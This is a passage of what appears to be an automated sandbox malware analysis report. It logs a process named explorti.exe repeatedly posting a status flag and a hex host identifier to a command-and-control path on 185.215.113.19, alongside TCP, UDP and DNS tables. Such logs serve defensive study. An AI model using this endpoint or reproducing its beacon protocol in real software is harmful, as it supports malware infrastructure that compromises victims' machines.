Jul 26, 2024 21:02:07.027900934 CEST	80	49788	185.215.113.19	192.168.2.4
Jul 26, 2024 21:02:07.027944088 CEST	49787	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:02:07.027988911 CEST	49788	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:02:07.028471947 CEST	49788	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:02:07.033905983 CEST	80	49788	185.215.113.19	192.168.2.4
Jul 26, 2024 21:02:07.057506084 CEST	49788	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:02:07.187376976 CEST	49789	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:02:07.192392111 CEST	80	49789	185.215.113.19	192.168.2.4
Jul 26, 2024 21:02:07.192461967 CEST	49789	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:02:07.192560911 CEST	49789	80	192.168.2.4	185.215.113.19
Jul 26, 2024 21:02:07.197871923 CEST	80	49789	185.215.113.19	192.168.2.4
Jul 26, 2024 21:02:07.980844975 CEST	80	49789	185.215.113.19	192.168.2.4
Jul 26, 2024 21:02:07.980911016 CEST	49789	80	192.168.2.4	185.215.113.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 21:01:31.083236933 CEST	51820	53	192.168.2.4	1.1.1.1
Jul 26, 2024 21:01:31.107517958 CEST	53	51820	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 26, 2024 21:01:31.083236933 CEST	192.168.2.4	1.1.1.1	0x5072	Standard query (0)	the.earth.li	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 26, 2024 21:01:31.107517958 CEST	1.1.1.1	192.168.2.4	0x5072	No error (0)	the.earth.li		93.93.131.124	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

the.earth.li

185.215.113.19

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:03.488514900 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:04.506050110 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:04.508035898 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:04.512954950 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:04.764952898 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:04.878895998 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:05.638811111 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:05.639847040 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:05.888022900 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:06.006237984 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:06.857532978 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:06.858216047 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:07.109142065 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:07.222353935 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:08.036206961 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:08.037004948 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:08.347659111 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49742	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:08.472771883 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:09.449157000 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:09.450205088 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:09.717824936 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49743	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:09.832916021 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:10.597944021 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:10.598630905 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:10.879043102 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:11.008584976 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:11.792984962 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:11.793606997 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:12.055654049 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49745	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:12.476506948 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:13.626576900 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:13.627280951 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:13.628213882 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:13.878670931 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49746	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:13.988054991 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:14.755743980 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:14.756407022 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:15.009021044 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49747	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:15.128667116 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:15.967746973 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:15.968574047 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:16.225486040 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49748	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:16.347243071 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:17.283024073 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:17.283792973 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:17.540508986 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49749	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:17.660832882 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:18.457194090 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
